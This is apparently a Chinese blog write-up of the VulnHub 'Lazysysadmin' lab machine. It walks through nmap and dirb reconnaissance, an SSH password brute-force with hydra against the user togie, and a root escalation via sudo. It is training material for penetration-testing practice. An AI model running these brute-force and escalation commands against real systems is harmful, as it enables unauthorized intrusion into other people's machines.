Lazysysadmin靶场实战【超详细】

下载地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

一、主机探测与端口扫描

nmap 192.168.121.0/24

 探测到ip地址为192.168.121.189,并且开启了22、80、139、445、3306、6667端口

二、web扫描

访问80web服务

 进行目录扫描

dirb http://192.168.121.189

 扫描出robots.txt,phpmyadmin,wordpress

 访问一下robots.txt

 依次拼接,/Backnode_files下发现一些js文件,翻了翻,没啥发现

访问phpmyadmin

尝试弱口令登录,没有成功

再访问wordpress

 给出提示,名字是togie

三、get shell

使用hydra工具,准备一个字典,爆破ssh密码(用户togie)

hydra -l togie -P passwd.txt ssh://192.168.121.189

 

爆破出来密码为12345

尝试ssh连接

ssh togie@192.168.121.189

 成功get shell

四、提权

sudo -l

查看具有sudo权限的命令程序

 显示为ALL,全用户

直接sudo su提权

提权成功

  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值